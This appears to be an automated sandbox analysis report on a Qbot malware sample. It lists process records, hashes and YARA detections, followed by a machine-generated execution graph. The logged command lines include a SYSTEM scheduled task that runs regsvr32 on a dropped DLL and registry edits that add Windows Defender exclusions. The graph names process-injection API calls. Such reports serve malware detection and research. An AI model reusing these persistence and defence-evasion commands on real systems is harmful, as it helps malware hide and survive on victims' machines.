                          Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn bganttcv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 13:18 /ET 13:30
                          Imagebase:0xf20000
                          File size:179712 bytes
                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:13:16:55
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd2.red
                          Imagebase:0xff050000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:13:16:56
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xffed0000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:13:16:57
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xfa0000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.622702900.0000000000420000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Author: Joe Security

                          General

                          Start time:13:16:59
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0x1b0000
                          File size:2972672 bytes
                          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.875258870.0000000000080000.00000040.00020000.sdmp, Author: Joe Security

                          General

                          Start time:13:17:00
                          Start date:28/09/2021
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fumtioiab' /d '0'
                          Imagebase:0xff9b0000
                          File size:74752 bytes
                          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:13:17:02
                          Start date:28/09/2021
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Otovcuqo' /d '0'
                          Imagebase:0xff650000
                          File size:74752 bytes
                          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:13:18:00
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xff200000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Start time:13:18:00
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -s 'C:\Users\user\Drezd.red'
                          Imagebase:0x990000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Disassembly

                          Code Analysis

                            Execution Graph

                            Execution Coverage:7.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.1%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:53

                            Graph

CloseHandle 10188->10192 10190 1000bb0e 10191 1000861a 2 API calls 10190->10191 10191->10187 10192->10187 10192->10190 10195 1000e410 10193->10195 10194 1000d0e3 10197 1000e3b6 10194->10197 10195->10194 10280 100091e3 10195->10280 10198 1000e3cd 10197->10198 10199 1000e3ed 10198->10199 10200 100091e3 HeapAlloc 10198->10200 10199->10104 10201 1000e3da 10200->10201 10201->10104 10203 100095e1 HeapAlloc 10202->10203 10204 1000b7ff GetVolumeInformationW 10203->10204 10205 100085d5 2 API calls 10204->10205 10206 1000b834 10205->10206 10207 10009640 2 API calls 10206->10207 10208 1000b855 lstrcatW 10207->10208 10285 1000c392 10208->10285 10211 1000b87b 10211->10110 10213 1000b698 10212->10213 10214 100095c7 HeapAlloc 10213->10214 10215 1000b6a2 10214->10215 10287 1001242d 10215->10287 10217 1000b6ed 10218 100085c2 2 API calls 10217->10218 10219 1000b6f9 10218->10219 10219->10113 10219->10114 10220 1001242d _ftol2_sse 10221 1000b6b7 10220->10221 10221->10217 10221->10220 10223 100095c7 HeapAlloc 10222->10223 10224 1000b8a5 10223->10224 10225 100095c7 HeapAlloc 10224->10225 10227 1000b8b1 10225->10227 10226 1000b941 GetCurrentProcess 10235 1000bbdf 10226->10235 10227->10226 10228 1001242d _ftol2_sse 10227->10228 10229 1000b902 10227->10229 10228->10227 10230 1001242d _ftol2_sse 10229->10230 10231 1000b92d 10229->10231 10230->10229 10232 100085c2 2 API calls 10231->10232 10233 1000b939 10232->10233 10234 100085c2 2 API calls 10233->10234 10234->10226 10236 1000bbf7 10235->10236 10237 1000b998 6 API calls 10236->10237 10238 1000bbfb memset GetVersionExA 10236->10238 10240 1000bc0f 10237->10240 10238->10119 10238->10120 10239 1000861a 2 API calls 10239->10238 10240->10238 10240->10239 10242 100122de 10241->10242 10244 1000d3d2 10241->10244 10243 1001242d _ftol2_sse 10242->10243 10242->10244 10243->10242 10245 1000902d 10244->10245 10246 1000903d 10245->10246 10246->10246 10247 1001242d _ftol2_sse 10246->10247 10248 10009058 10247->10248 10249 1000908c 10248->10249 10250 
1001242d _ftol2_sse 10248->10250 10251 1000cd33 10249->10251 10250->10248 10252 1000cf18 10251->10252 10253 100095c7 HeapAlloc 10252->10253 10255 1000cf48 10252->10255 10258 100085c2 2 API calls 10252->10258 10297 100093be 10252->10297 10253->10252 10290 1000aba3 CreateToolhelp32Snapshot 10255->10290 10257 1000cf5f 10260 1000cf7c 10257->10260 10303 100094b7 10257->10303 10258->10252 10260->10092 10262 1000874f memset 10261->10262 10263 10009654 _vsnwprintf 10262->10263 10264 10009671 10263->10264 10264->10129 10266 1000b9ba GetLastError 10265->10266 10267 1000b9d7 10265->10267 10266->10267 10268 1000b9c5 10266->10268 10267->10098 10274 10008604 HeapAlloc 10268->10274 10270 1000b9cd 10270->10267 10271 1000b9db GetTokenInformation 10270->10271 10271->10267 10272 1000b9f0 10271->10272 10273 1000861a 2 API calls 10272->10273 10273->10267 10274->10270 10276 1000b963 10275->10276 10277 1000b98a 10276->10277 10278 1000b967 GetLastError 10276->10278 10277->10187 10277->10188 10278->10277 10279 1000b974 GetCurrentProcess 10278->10279 10279->10277 10281 100091ec 10280->10281 10283 100091fe 10280->10283 10284 10008604 HeapAlloc 10281->10284 10283->10194 10284->10283 10286 1000b867 CharUpperBuffW 10285->10286 10286->10211 10288 1001243c 10287->10288 10289 10012480 _ftol2_sse 10288->10289 10289->10221 10291 1000abf4 10290->10291 10292 1000abc9 memset Process32First 10290->10292 10291->10257 10292->10291 10293 1000ac02 10292->10293 10295 1000ac15 Process32Next 10293->10295 10295->10293 10299 100093d2 10297->10299 10314 10008604 HeapAlloc 10299->10314 10302 1000942a 10314->10302 10317 1000c91c 10316->10317 10344 10008604 HeapAlloc 10317->10344 10319 1000ca14 10319->10138 10324 1000a86d 10319->10324 10320 100095e1 HeapAlloc 10321 1000c9b7 10320->10321 10321->10319 10321->10320 10322 100085d5 2 API calls 10321->10322 10323 100091e3 HeapAlloc 10321->10323 10322->10321 10323->10321 10325 1000a886 10324->10325 10345 1000a7bc 10325->10345 10328->10147 10358 1000c4ce 10329->10358 10332 
1000cc80 10337 1000861a 2 API calls 10332->10337 10339 1000cca1 10332->10339 10333 1000cc72 FreeLibrary 10333->10332 10336 1000cbaa memset 10338 1000cbdf 10336->10338 10337->10339 10340 1000cbe7 NtProtectVirtualMemory 10338->10340 10341 1000cc67 10338->10341 10339->10147 10340->10341 10342 1000cc29 NtWriteVirtualMemory 10340->10342 10341->10332 10341->10333 10342->10341 10343 1000cc46 NtProtectVirtualMemory 10342->10343 10343->10341 10344->10321 10346 100122d3 _ftol2_sse 10345->10346 10347 1000a7d4 10346->10347 10348 100095c7 HeapAlloc 10347->10348 10349 1000a7fe 10348->10349 10354 10009601 10349->10354 10351 1000a85c 10352 100085c2 2 API calls 10351->10352 10353 1000a867 10352->10353 10353->10147 10355 1000874f memset 10354->10355 10356 10009615 _vsnprintf 10355->10356 10357 1000962f 10356->10357 10357->10351 10359 1000c4ea 10358->10359 10360 1000c4fc 10358->10360 10359->10360 10361 1000c627 10359->10361 10362 100095e1 HeapAlloc 10360->10362 10361->10341 10383 1000c6c0 10361->10383 10363 1000c509 10362->10363 10364 10009640 2 API calls 10363->10364 10365 1000c542 10364->10365 10366 100095e1 HeapAlloc 10365->10366 10367 1000c55f 10366->10367 10401 100092e5 10367->10401 10370 100085d5 2 API calls 10371 1000c587 10370->10371 10372 100092e5 2 API calls 10371->10372 10373 1000c5aa LoadLibraryW 10372->10373 10375 1000c5d5 10373->10375 10376 1000c5e3 10373->10376 10377 1000e171 3 API calls 10375->10377 10378 1000861a 2 API calls 10376->10378 10377->10376 10379 1000c5f8 memset 10378->10379 10379->10361 10380 1000c619 10379->10380 10381 1000861a 2 API calls 10380->10381 10382 1000c625 10381->10382 10382->10361 10385 1000c6f4 10383->10385 10384 1000c715 NtCreateSection 10386 1000c73e RegisterClassExA 10384->10386 10400 1000c880 10384->10400 10385->10384 10385->10400 10387 1000c790 CreateWindowExA 10386->10387 10388 1000c7cc GetCurrentProcess NtMapViewOfSection 10386->10388 10387->10388 10391 1000c7ba DestroyWindow UnregisterClassA 10387->10391 10392 1000c7f7 
NtMapViewOfSection 10388->10392 10388->10400 10389 1000c8d2 GetCurrentProcess NtUnmapViewOfSection 10390 1000c8e5 10389->10390 10393 1000c8f8 10390->10393 10394 1000c8ed NtClose 10390->10394 10391->10388 10395 1000c81e 10392->10395 10392->10400 10393->10336 10393->10341 10394->10393 10396 10008669 HeapAlloc 10395->10396 10397 1000c82e 10396->10397 10398 1000c839 VirtualAllocEx WriteProcessMemory 10397->10398 10397->10400 10399 1000861a 2 API calls 10398->10399 10399->10400 10400->10389 10400->10390 10402 100092f7 10401->10402 10407 10008604 HeapAlloc 10402->10407 10404 10009316 10405 10009322 lstrcatW 10404->10405 10406 10009333 10404->10406 10405->10404 10406->10370 10407->10404 10528 10008604 HeapAlloc 10408->10528 10410 10009b6d 10439 10005c45 10410->10439 10529 1000b5f6 10410->10529 10413 100095c7 HeapAlloc 10414 10009bb0 10413->10414 10415 10009ceb 10414->10415 10420 10009bdc 10414->10420 10416 10009d3c 10415->10416 10417 10009cfd 10415->10417 10418 10009292 2 API calls 10416->10418 10421 10009292 2 API calls 10417->10421 10442 10009ce7 10417->10442 10418->10442 10419 100085c2 2 API calls 10423 10009d5c 10419->10423 10420->10442 10539 10009292 10420->10539 10421->10442 10424 1000861a 2 API calls 10423->10424 10435 10009db2 10423->10435 10425 10009d9b memset 10424->10425 10428 1000861a 2 API calls 10425->10428 10427 10009ca1 10431 10009292 2 API calls 10427->10431 10428->10435 10429 100095e1 HeapAlloc 10430 10009c3f 10429->10430 10432 100092e5 2 API calls 10430->10432 10434 10009cc8 10431->10434 10433 10009c51 10432->10433 10436 100085d5 2 API calls 10433->10436 10441 1000861a 2 API calls 10434->10441 10435->10435 10437 1000861a 2 API calls 10435->10437 10438 10009c5f 10436->10438 10437->10439 10545 10009256 10438->10545 10439->10152 10439->10153 10447 1000fb19 10439->10447 10441->10442 10442->10419 10444 1000861a 2 API calls 10445 10009c96 10444->10445 10446 1000861a 2 API calls 10445->10446 10446->10427 10553 10008604 HeapAlloc 10447->10553 10449 1000fb2a 
10449->10153 10450 1000fb20 10450->10449 10554 1000a6a9 10450->10554 10453 1000fb6e 10453->10153 10455 1000fb55 10456 1000f8cc 15 API calls 10455->10456 10457 1000fb6b 10456->10457 10457->10153 10459 1000a86d 5 API calls 10458->10459 10460 10005d9a 10459->10460 10461 10005974 8 API calls 10460->10461 10463 10005c6e 10460->10463 10462 10005dd4 10461->10462 10462->10463 10586 10009ebb 10462->10586 10463->10157 10463->10158 10466 10005de6 lstrcmpiW 10466->10463 10468 1000a86d 5 API calls 10467->10468 10469 1000598d 10468->10469 10470 10009292 2 API calls 10469->10470 10472 1000599a 10469->10472 10471 100059bd 10470->10471 10610 1000590c 10471->10610 10474 100059cd 10475 100059f1 10474->10475 10478 1000590c 2 API calls 10474->10478 10476 1000861a 2 API calls 10475->10476 10477 100059fd 10476->10477 10479 10005bc4 10477->10479 10478->10475 10480 10009ebb 3 API calls 10479->10480 10481 10005bce 10480->10481 10482 10005bd7 10481->10482 10483 10005bdc lstrcmpiW 10481->10483 10482->10170 10484 10005bf2 10483->10484 10485 10005c14 10483->10485 10615 10009f6c 10484->10615 10487 1000861a 2 API calls 10485->10487 10487->10482 10658 10008604 HeapAlloc 10490->10658 10492 10005b11 10493 10005b24 GetDriveTypeW 10492->10493 10494 10005b55 10492->10494 10493->10494 10659 10005a7b 10494->10659 10496 10005b71 10497 10005ba1 10496->10497 10676 10004d6d 10496->10676 10762 1000a39e 10497->10762 10501 1000a39e 2 API calls 10502 10005bbd 10501->10502 10502->10160 10504 1000109a HeapAlloc 10503->10504 10505 1000f8db 10504->10505 11262 100061b4 memset 10505->11262 10508 100085d5 2 API calls 10509 1000f901 10508->10509 10510 1000f978 10509->10510 11274 10009e66 10509->11274 10510->10170 10514 1000f92c 10514->10510 10515 1000109a HeapAlloc 10514->10515 10516 1000f93e 10515->10516 10517 10009640 2 API calls 10516->10517 10518 1000f94d 10517->10518 10519 1000a911 2 API calls 10518->10519 10520 1000f95e 10519->10520 10521 1000f96c 10520->10521 11280 1000a239 10520->11280 10523 1000861a 2 API calls 
10521->10523 10523->10510 10525 10005a73 10524->10525 11288 10005631 10525->11288 10528->10410 10530 1000b60f 10529->10530 10531 1001242d _ftol2_sse 10530->10531 10532 1000b61f 10531->10532 10533 100095c7 HeapAlloc 10532->10533 10535 1000b62e 10533->10535 10534 1000b66a 10536 100085c2 2 API calls 10534->10536 10535->10534 10537 1001242d _ftol2_sse 10535->10537 10538 10009b91 10536->10538 10537->10535 10538->10413 10540 100092a4 10539->10540 10551 10008604 HeapAlloc 10540->10551 10542 100092c1 10543 100092de 10542->10543 10544 100092cd lstrcatA 10542->10544 10543->10423 10543->10427 10543->10429 10544->10542 10546 1000928c 10545->10546 10547 1000925f 10545->10547 10546->10444 10552 10008604 HeapAlloc 10547->10552 10549 10009271 10549->10546 10550 10009279 MultiByteToWideChar 10549->10550 10550->10546 10551->10542 10552->10549 10553->10450 10555 1000a6c2 10554->10555 10556 1000a6bb 10554->10556 10555->10556 10559 1000a6f0 10555->10559 10581 10008604 HeapAlloc 10555->10581 10556->10453 10560 1000f9bf 10556->10560 10558 1000861a 2 API calls 10558->10556 10559->10556 10559->10558 10582 10008604 HeapAlloc 10560->10582 10562 1000fb10 10562->10455 10563 1000f9d2 10563->10562 10565 1000fabc 10563->10565 10583 1000109a 10563->10583 10567 1000861a 2 API calls 10565->10567 10567->10562 10568 100095e1 HeapAlloc 10569 1000fa2c 10568->10569 10570 100092e5 2 API calls 10569->10570 10571 1000fa49 10570->10571 10572 1000a6a9 3 API calls 10571->10572 10573 1000fa56 10572->10573 10574 100085d5 2 API calls 10573->10574 10575 1000fa62 10574->10575 10576 100085d5 2 API calls 10575->10576 10578 1000fa6b 10576->10578 10577 1000861a 2 API calls 10579 1000fab1 10577->10579 10578->10577 10580 1000861a 2 API calls 10579->10580 10580->10565 10581->10559 10582->10563 10584 10008531 HeapAlloc 10583->10584 10585 100010b5 10584->10585 10585->10568 10589 10009f95 10586->10589 10590 10009fbe 10589->10590 10601 10009b0e 10590->10601 10592 10005de2 10592->10463 10592->10466 10593 10009fc9 10593->10592 
10604 1000be9b 10593->10604 10595 1000a095 10596 1000861a 2 API calls 10595->10596 10596->10592 10597 1000a070 10599 1000861a 2 API calls 10597->10599 10598 10009ffd 10598->10595 10598->10597 10600 10008669 HeapAlloc 10598->10600 10599->10595 10600->10597 10608 10008604 HeapAlloc 10601->10608 10603 10009b1a 10603->10593 10605 1000bec1 10604->10605 10607 1000bec5 10605->10607 10609 10008604 HeapAlloc 10605->10609 10607->10598 10608->10603 10609->10607 10611 1000591c 10610->10611 10614 10005917 10610->10614 10612 10005934 GetLastError 10611->10612 10613 1000593f GetLastError 10611->10613 10612->10614 10613->10614 10614->10474 10616 10009f7c 10615->10616 10631 1000a0ab 10616->10631 10619 1000b1b1 SetFileAttributesW memset 10620 1000b1ec 10619->10620 10621 1000b1ff 10620->10621 10622 1001242d _ftol2_sse 10620->10622 10621->10485 10623 1000b21b 10622->10623 10624 10009640 2 API calls 10623->10624 10625 1000b22c 10624->10625 10626 100092e5 2 API calls 10625->10626 10627 1000b23d 10626->10627 10627->10621 10646 1000b0de 10627->10646 10630 1000861a 2 API calls 10630->10621 10632 10005c08 10631->10632 10633 1000a0c8 10631->10633 10632->10485 10632->10619 10633->10632 10634 1001242d _ftol2_sse 10633->10634 10635 1000a112 10634->10635 10645 10008604 HeapAlloc 10635->10645 10637 1000a126 10637->10632 10638 100122d3 _ftol2_sse 10637->10638 10639 1000a168 10638->10639 10640 10009b0e HeapAlloc 10639->10640 10642 1000a1b4 10640->10642 10641 1000861a 2 API calls 10641->10632 10643 1000861a 2 API calls 10642->10643 10644 1000a21e 10642->10644 10643->10644 10644->10641 10645->10637 10647 1000b101 10646->10647 10648 1000b109 memset 10647->10648 10657 1000b178 10647->10657 10649 100095e1 HeapAlloc 10648->10649 10650 1000b125 10649->10650 10651 1001242d _ftol2_sse 10650->10651 10652 1000b141 10651->10652 10653 10009640 2 API calls 10652->10653 10654 1000b157 10653->10654 10655 100085d5 2 API calls 10654->10655 10656 1000b160 MoveFileW 10655->10656 10656->10657 10657->10630 10658->10492 
10770 10001080 10659->10770 10664 100085c2 2 API calls 10665 10005ab7 10664->10665 10666 10001080 HeapAlloc 10665->10666 10675 10005af7 10665->10675 10667 10005ac5 10666->10667 10779 10008910 10667->10779 10671 100085c2 2 API calls 10673 10005aeb 10671->10673 10672 10005ae1 10672->10671 10674 1000861a 2 API calls 10673->10674 10674->10675 10675->10496 10677 10004d91 10676->10677 10678 10004de7 10676->10678 10680 100095c7 HeapAlloc 10677->10680 10679 1000b7a8 10 API calls 10678->10679 10690 10004e1d 10678->10690 10681 10004dfc 10679->10681 10682 10004d9b 10680->10682 10683 1000a86d 5 API calls 10681->10683 10684 100095c7 HeapAlloc 10682->10684 10685 10004e08 10683->10685 10686 10004dab 10684->10686 10875 1000a471 10685->10875 10686->10678 10689 10004db9 GetModuleHandleA 10686->10689 10688 10004e14 10688->10690 10693 1000e1bc 7 API calls 10688->10693 10691 10004dc6 GetModuleHandleA 10689->10691 10692 10004dcd 10689->10692 10690->10497 10691->10692 10694 100085c2 2 API calls 10692->10694 10695 10004e37 10693->10695 10697 10004dde 10694->10697 10696 100095e1 HeapAlloc 10695->10696 10698 10004e48 10696->10698 10699 100085c2 2 API calls 10697->10699 10700 100092e5 2 API calls 10698->10700 10699->10678 10701 10004e60 10700->10701 10702 100085d5 2 API calls 10701->10702 10704 10004e73 10702->10704 10703 10004e9c 10706 1000861a 2 API calls 10703->10706 10704->10703 10880 1000896f 10704->10880 10707 10004ead 10706->10707 10900 10004a0b memset 10707->10900 10708 10004e8f 10708->10703 10711 1000a2e3 6 API calls 10708->10711 10711->10703 10712 100051f1 10714 100095e1 HeapAlloc 10712->10714 10716 100051fd 10714->10716 10717 100092e5 2 API calls 10716->10717 10721 10005215 10717->10721 10718 10005245 10720 100085d5 2 API calls 10718->10720 10719 1000e2c6 40 API calls 10722 10004f64 10719->10722 10723 10005251 lstrcpynW lstrcpynW 10720->10723 10721->10718 10726 1000861a 2 API calls 10721->10726 10722->10712 10724 10004fb3 10722->10724 10729 10005082 10722->10729 10725 10005296 
10723->10725 10724->10712 10731 10004fbc 10724->10731 10727 1000861a 2 API calls 10725->10727 10726->10718 10728 100052a8 10727->10728 10730 1000861a 2 API calls 10728->10730 10729->10712 10974 1000fc1f 10729->10974 10730->10690 10969 10008604 HeapAlloc 10731->10969 10734 10005006 10734->10690 10736 100095e1 HeapAlloc 10734->10736 10738 1000501f 10736->10738 10740 10009640 2 API calls 10738->10740 10739 10005110 10739->10712 10742 1000109a HeapAlloc 10739->10742 10741 10005052 10740->10741 10743 100085d5 2 API calls 10741->10743 10744 10005129 10742->10744 10745 1000505c 10743->10745 10746 1000902d _ftol2_sse 10744->10746 10970 1000a911 memset 10745->10970 10748 1000514b 10746->10748 10985 100060df 10748->10985 10753 100051e2 10755 10009640 2 API calls 10764 1000a3ad 10762->10764 10769 10005bb5 10762->10769 10763 1000a3d2 10765 1000861a 2 API calls 10763->10765 10764->10763 10766 1000861a 2 API calls 10764->10766 10767 1000a3dd 10765->10767 10766->10764 10768 1000861a 2 API calls 10767->10768 10768->10769 10769->10501 10771 100084ab HeapAlloc 10770->10771 10772 10001096 10771->10772 10773 1000a51a 10772->10773 10774 1000a538 10773->10774 10775 1001242d _ftol2_sse 10774->10775 10776 1000a580 10774->10776 10778 10005aa7 10774->10778 10775->10774 10777 10008669 HeapAlloc 10776->10777 10776->10778 10777->10778 10778->10664 10780 10005ad4 10779->10780 10781 1000891f 10779->10781 10780->10672 10787 1000a2e3 10780->10787 10798 10008604 HeapAlloc 10781->10798 10783 10008929 10783->10780 10799 10008815 10783->10799 10786 1000861a 2 API calls 10786->10780 10834 10008a90 10787->10834 10791 1000a397 10791->10672 10792 1000a38f 10849 10008cc0 10792->10849 10795 1000a2fd 10795->10791 10795->10792 10796 10008698 3 API calls 10795->10796 10840 10009749 10795->10840 10845 100091a6 10795->10845 10796->10795 10798->10783 10809 10008604 HeapAlloc 10799->10809 10801 100088d6 10803 1000861a 2 API calls 10801->10803 10808 10008837 10801->10808 10802 1000882a 10802->10801 10802->10808 
10810 1000ebf0 10802->10810 10803->10808 10806 100088f0 10807 1000861a 2 API calls 10806->10807 10807->10808 10808->10780 10808->10786 10809->10802 10825 10008604 HeapAlloc 10810->10825 10812 1000ec14 10813 1000ed7f 10812->10813 10826 10008604 HeapAlloc 10812->10826 10816 1000861a 2 API calls 10813->10816 10815 1000ec2c 10815->10813 10827 10008604 HeapAlloc 10815->10827 10817 1000eda5 10816->10817 10819 1000861a 2 API calls 10817->10819 10820 1000edb3 10819->10820 10821 100088cf 10820->10821 10822 1000861a 2 API calls 10820->10822 10821->10801 10821->10806 10822->10821 10823 1000ec42 10823->10813 10828 10008698 10823->10828 10825->10812 10826->10815 10827->10823 10833 10008604 HeapAlloc 10828->10833 10830 100086ad 10831 1000861a 2 API calls 10830->10831 10832 100086d5 10830->10832 10831->10832 10832->10823 10833->10830 10837 10008ab3 10834->10837 10835 10008604 HeapAlloc 10835->10837 10836 10008be7 10839 10008604 HeapAlloc 10836->10839 10837->10835 10837->10836 10838 1000861a 2 API calls 10837->10838 10838->10837 10839->10795 10841 1000974b 10840->10841 10842 10009780 SetLastError 10841->10842 10843 1000978c SetLastError 10841->10843 10844 10009799 10842->10844 10843->10844 10844->10795 10846 100091b1 10845->10846 10847 100091c7 10845->10847 10861 10008604 HeapAlloc 10846->10861 10847->10795 10850 10008ccf 10849->10850 10860 10008d57 10849->10860 10851 10008d09 10850->10851 10852 1000861a 2 API calls 10850->10852 10850->10860 10855 10008d19 10851->10855 10862 10008de5 10851->10862 10852->10850 10854 10008d34 10857 10008d4a 10854->10857 10859 1000861a 2 API calls 10854->10859 10855->10854 10856 1000861a 2 API calls 10855->10856 10856->10854 10858 1000861a 2 API calls 10857->10858 10858->10860 10859->10857 10860->10791 10861->10847 10869 10008604 HeapAlloc 10862->10869 10864 10008e28 10864->10855 10865 10008e1e 10865->10864 10867 10008e61 10865->10867 10870 1000879d 10865->10870 10868 1000861a 2 API calls 10867->10868 10868->10864 10869->10865 10871 1001242d 
_ftol2_sse 10870->10871 10872 100087b6 10871->10872 10873 100087e3 10872->10873 10874 1001242d _ftol2_sse 10872->10874 10873->10867 10874->10872 10876 1000a485 10875->10876 10877 1000a495 GetLastError 10876->10877 10878 1000a48b GetLastError 10876->10878 10879 1000a4a2 10877->10879 10878->10879 10879->10688 10995 10008604 HeapAlloc 10880->10995 10882 10008990 10883 100089a1 lstrcpynW 10882->10883 10890 1000899a 10882->10890 10884 10008a14 10883->10884 10885 100089c4 10883->10885 10996 10008604 HeapAlloc 10884->10996 10887 1000a6a9 3 API calls 10885->10887 10889 100089d0 10887->10889 10888 10008a1f 10888->10890 10892 1000861a 2 API calls 10888->10892 10896 10008a39 10888->10896 10891 10008815 3 API calls 10889->10891 10889->10896 10890->10708 10893 100089ea 10891->10893 10892->10896 10893->10888 10897 100089f0 10893->10897 10894 10008a61 10895 1000861a 2 API calls 10894->10895 10895->10890 10896->10894 10898 1000861a 2 API calls 10896->10898 10899 1000861a 2 API calls 10897->10899 10898->10894 10899->10890 10901 10004a41 10900->10901 10902 10004a76 10901->10902 10997 10002ba4 10901->10997 10903 1000b7a8 10 API calls 10902->10903 10906 10004ae2 10902->10906 10905 10004a8d 10903->10905 10907 1000b67d 4 API calls 10905->10907 10906->10712 10964 1000e2c6 10906->10964 10908 10004a9d 10907->10908 11013 100049c7 10908->11013 10910 10004aa7 10966 1000e2fa 10964->10966 10965 10004f40 10965->10719 10965->10722 10966->10965 11166 10008604 HeapAlloc 10966->11166 11167 10004905 10966->11167 10969->10734 10975 1000fc43 10974->10975 10976 100050fa 10974->10976 10977 10008669 HeapAlloc 10975->10977 10976->10712 10984 10008604 HeapAlloc 10976->10984 10978 1000fc4d 10977->10978 10978->10976 10979 1000fc8e 10978->10979 10980 100060df 4 API calls 10978->10980 10981 1000861a 2 API calls 10979->10981 10982 1000fcac 10980->10982 10981->10976 10982->10979 11226 1000f7e3 10982->11226 10984->10739 10986 100060ea 10985->10986 10994 10005168 10985->10994 11261 10008604 HeapAlloc 10986->11261 
10994->10753 10994->10755 10995->10882 10996->10888 10998 10002bc0 10997->10998 10999 10002c5c 10998->10999 11000 1000109a HeapAlloc 10998->11000 10999->10902 11001 10002bd3 11000->11001 11002 100092e5 2 API calls 11001->11002 11003 10002be5 11002->11003 11004 100085d5 2 API calls 11003->11004 11005 10002bf0 11004->11005 11006 1000109a HeapAlloc 11005->11006 11007 10002bfa 11006->11007 11131 1000bf37 11007->11131 11010 100085d5 2 API calls 11011 10002c16 11010->11011 11012 1000861a 2 API calls 11011->11012 11012->10999 11014 10009256 2 API calls 11013->11014 11015 100049d2 11014->11015 11016 100095e1 HeapAlloc 11015->11016 11017 100049e1 11016->11017 11018 100092e5 2 API calls 11017->11018 11019 100049ed 11018->11019 11020 100085d5 2 API calls 11019->11020 11021 100049f8 11020->11021 11022 1000861a 2 API calls 11021->11022 11023 10004a03 11022->11023 11023->10910 11132 1000bf64 11131->11132 11135 10002c08 11132->11135 11137 10008604 HeapAlloc 11132->11137 11134 1000bf94 11134->11135 11136 1000861a 2 API calls 11134->11136 11135->11010 11136->11135 11137->11134 11166->10966 11168 10004928 11167->11168 11169 10004995 11168->11169 11170 10004a0b 35 API calls 11168->11170 11169->10966 11172 10004948 11170->11172 11171 10004986 11185 100047ca 11171->11185 11172->11169 11172->11171 11175 1000ad44 11172->11175 11176 1000ad65 11175->11176 11177 1000ad5e 11175->11177 11178 1000ad71 GetLastError 11176->11178 11179 1000ad79 11176->11179 11177->11172 11178->11177 11180 1000b998 6 API calls 11179->11180 11181 1000ad8b 11180->11181 11181->11177 11182 1000ada2 memset 11181->11182 11184 1000adea 11181->11184 11182->11184 11183 1000861a 2 API calls 11183->11177 11184->11183 11186 100060df 4 API calls 11185->11186 11187 100047ef 11186->11187 11188 1000109a HeapAlloc 11187->11188 11201 100047fb 11187->11201 11189 1000481a 11188->11189 11190 100092e5 2 API calls 11189->11190 11191 1000482c 11190->11191 11192 100085d5 2 API calls 11191->11192 11201->11169 11227 1000f883 11226->11227 
